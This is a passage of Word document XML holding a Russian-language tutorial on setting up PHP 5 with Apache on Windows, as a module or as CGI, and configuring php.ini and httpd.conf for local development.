        <w:t>При установке PHP в качестве модуля настройки из php.ini читаются один раз при запуске Web-сервера. Поэтому при внесении изменений в php.ini необходимо перегрузить Apache для того, чтобы внесенные изменения вступили в силу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для установки PHP откройте файл главный настроечный файл Apache httpd.conf на редактирование и удалите символы комментариев со следующих строк, при необходимости изменив их:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">AddType application/x-httpd-php phtml php </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadModule php5_module c:/php/php5apache2.dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вместо директории c:/php подставьте Вашу директорию с установленным PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установка PHP, как CGI-приложения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При установке PHP, как CGI-приложения интерпретатор PHP будет загружаться каждый раз при вызове PHP-сценария. В связи с этим, возможно, некоторое ухудшение быстродействия. Если PHP установлен, как CGI, то при внесении изменений в файл php.ini Apache перезагружать не следует, так как установки читаются каждый раз при выполнении PHP-сценария. Установка PHP как CGI немного ускоряет внесение изменений в конфигурацию PHP, так она не требует перезагрузки WEB-сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>При установке PHP, как CGI перестанут работать некоторые заголовки, например, Вы не сможете организовать авторизацию пользователей средствами PHP. Авторизации можно будет реализовать только средствами самого Apache с помощью файлов .htaccess.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для установки PHP откройте главный настроечный файл httpd.conf на редактирование, найдите в нем закомментированные строки подключения PHP и измените их следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">AddType application/x-httpd-php phtml php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&lt;Directory «c:/php»&gt;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Options ExecCGI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&lt;/Directory&gt;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ScriptAlias «/php_dir/» «c:/php/» </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Action application/x-httpd-php «/php_dir/php-cgi.exe»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вместо директории c:/php подставьте Вашу директорию с установленным PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Конфигурирование PHP (файл php.ini)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Так как на локальной машине вы, скорее всего, будете заняты тестированием Ваших Web-приложений, то необходимо должным образом настроить конфигурационный файл php.ini. Найдите директиву error_reporting и установите для не</w:t>
      </w:r>
      <w:r w:rsidR="00776B59" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> следующее значение:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>error_reporting = E_ALL &amp; ~E_NOTICE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Это значение настроит PHP таким образом, что при работе PHP-скриптов будут отображаться все ошибки, а «замечания» будут игнорироваться. Так же обходимо проследить, чтобы директива display_errors, была включена:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>display_errors = On</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если данная директива отключена (Off), то сообщения об ошибках не будут выводится в окно браузера и в случае возникновения в коде ошибки вы будете гадать перед девственно белым окном — что бы это означало.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Так же необходимо проследить, чтобы директива variables_order имела следующее значение:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>variables_order = «EGPCS»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Буквы здесь означают следующее:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E - переменными среды</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>G - переменными передаваемыми по методу GET (G)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P - переменными передаваемыми по методу POST (P)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">C - Cookies </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">S - сессии </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отсутствие какой-либо из букв не позволит вам работать с соответствующими переменными.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Следующая директива, которая может потребовать настройки – это register_globals. Если данная директива включена</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>register_globals = On</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>то переменные передаваемые метором GET, POST, через cookies и сессии можно использовать в PHP-скрипте, обращаясь к ним просто как обычным переменным $someone.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если данная директива отключена</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>register_globals = Off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>то к таким переменным можно будет обращаться только при помощи суперглобальных массивов ($_POST, $_GET и т.п.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Директива register_long_arrays позволяет использовать суперглобальные массивы в старом формате («длинном» - $HTTP_GET_VARS, $HTTP_POST_VARS и т.д.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>register_long_arrays = On</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Теперь необходимо настроить индексный файл. Если в окне браузера набрать строку http://localhost/, а не http://localhost/index.html. Сервер вс</w:t>
      </w:r>
      <w:r w:rsidR="00776B59" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> равно предоставит браузеру index.html, так как этот файл является индексным и ищется в директории первую очередь, если не указан конкретный файл. Теперь необходимо настроить http.conf, таким образом, чтобы Web-сервер Apache так же реагировал на файлы index.php. Для этого найдте в http.conf директиву DirectoryIndex и исправьте е</w:t>
      </w:r>
      <w:r w:rsidR="00776B59" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DirectoryIndex index.html index.html.var index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>После этого необходимо перегрузить сервер Apache, а в корневой директории виртуального хоста («C:/www/scripts») создать пробный файл PHP (index.php):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">phpinfo(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В случае успешной настройки, обращение по адресу http://localhost/index.php отобразит фиолетовую таблицу с текущими настройками PHP, которая выда</w:t>
      </w:r>
      <w:r w:rsidR="00776B59" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>тся функцией phpinfo().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таким образом, у нас настроена связка Apache и PHP и можно переходить к настройке MySQL. Распакуйте дистрибутив MySQL во временную директорию и запустите установщик. Контролировать работу сервера MySQL можно точно так же как и Apache, используя консоль управления сервисов Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подключение MySQL</w:t>
      </w:r>
    </w:p>
